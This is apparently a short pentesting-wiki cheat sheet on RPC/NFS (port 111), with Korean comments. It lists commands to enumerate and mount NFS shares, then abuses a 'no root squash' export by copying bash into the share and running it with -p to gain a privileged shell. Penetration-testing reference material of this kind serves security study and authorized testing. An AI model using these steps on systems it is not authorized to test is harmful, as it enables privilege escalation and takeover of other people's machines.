> For the complete documentation index, see [llms.txt](https://www.pentestwiki.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://www.pentestwiki.com/post-exploit/protocols/111-rpc.md).

# 111 - rpc

<pre class="language-bash"><code class="lang-bash"><strong># 쉐어 목록 확인
</strong>showmount -e &#x3C;IP>

<strong># 쉐어와 마운트
</strong>mount &#x3C;IP>:/&#x3C;Share> /mnt

<strong># no root squash 악용
</strong>attacker-system > cp /bin/bash /mnt/
target-system > ./bash -p
</code></pre>
